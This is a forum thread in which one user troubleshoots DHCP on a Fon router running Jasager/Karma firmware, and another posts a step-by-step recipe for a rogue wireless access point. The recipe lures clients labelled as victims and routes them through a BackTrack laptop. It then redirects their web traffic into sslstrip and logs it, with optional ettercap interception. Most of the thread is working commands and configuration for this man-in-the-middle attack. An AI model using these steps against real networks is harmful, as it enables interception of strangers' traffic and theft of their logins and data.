Jump to content

Fon + Backtrack Dhcp Problem

Recommended Posts

I have been trying to get this to work for a cople of days now and i have made it work(sort of).

The problem i have is that the dhcp dont give the clients my BackTrack's ip as gateway but the the fons ip-adress.

is there something that i have forgotten?






[Victims PC]

wlan gw

wlan dns


config dnsmasq
    option domainneeded    1
    option boguspriv    1
    option filterwin2k    '0'  #enable for dial on demand
    option localise_queries    1
    option local    '/lan/'
    option domain    'lan'
    option expandhosts    1
    option nonegcache    0
    option authoritative    1
    option readethers    1
    option leasefile    '/tmp/dhcp.leases'
    option resolvfile    '/tmp/resolv.conf.auto'
    list 'dhcp_option'    '3,'
    list 'dhcp_option'    '6,,'

config dhcp lan
    option interface    lan
    option start     100
    option limit    150
    option leasetime    12h

config dhcp wan
    option interface    wan
    option ignore    1

Link to comment
Share on other sites

These are my steps I created with a vast amount of jumping through this forum.

This is my setup:


Jasager is connected to my BT4 laptop ethernet port via crossover cable.

BT4 laptop wireless is connected to a legitimate wireless access point using wlan0.

1)    Jailbreak Fon (Hak5 Forums) then Using Jasager Firmware 2.1 from digininja using FonFlash.exe or ap51-flash-fonera-gui1.0-42.exe

2)    Telnet the fon ( and 'passwd root' then 'reboot'

3)    Use winscp424 and transfer over haserl_0.9.24-1_mips.ipk and webif_0.3-4709_mips.ipk to the /tmp directory on the fon

4)    SSH (putty) into the fon and cd /tmp then run 'opkg install haserl...' when completed run 'opkg install webif...' then 'reboot'

5)    Edit /etc/config/dhcp
        list 'dhcp_option'      '3,'  **Sets Gateway to Laptop LAN card
        list 'dhcp_option'      '6,'        **Sets DNS to GoogleDNS

6)    Edit /karma/www/cgi-bin/functions.rb
    under "def create_interface()" add the following:
    system("sleep 1")
    system("brctl addif br-lan ath0 2>&1 > /dev/null")

7)    Login webif, Network tab, DHCP subtab, Disable Bogus Private Reverse Lookups, Disable filterwin2k, Disable Localise Queries   ---Save settings and apply

8)    Login Webif, Network Tab, Networks subtab, Set IP address with netmask   ---Save settings and apply

Optional: edit /etc/banner

Those steps might not have the most up to date files. But that is the process of getting it installed and working for me on my Fon2100.

Then on BackTrack4:

Boot BackTrack4 on laptop.
connect to wireless access point using network manager. (start-network)
then ifconfig eth0
check ifconfig make sure both interfaces have IP addresses

echo 1 > /proc/sys/net/ipv4/ip_forward

sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

login to Jasager interface
turn on ath0 button
add your ssid your laptop is getting internet from to the blacklist
enable karma

I use this setup with SSL Strip:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

optional: ettercap -u -T -q -i eth0

sslstrip -a -l 64123 -w /root/sslstriplog.txt -f /usr/share/sslstrip/lock.ico

Hope this helps.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...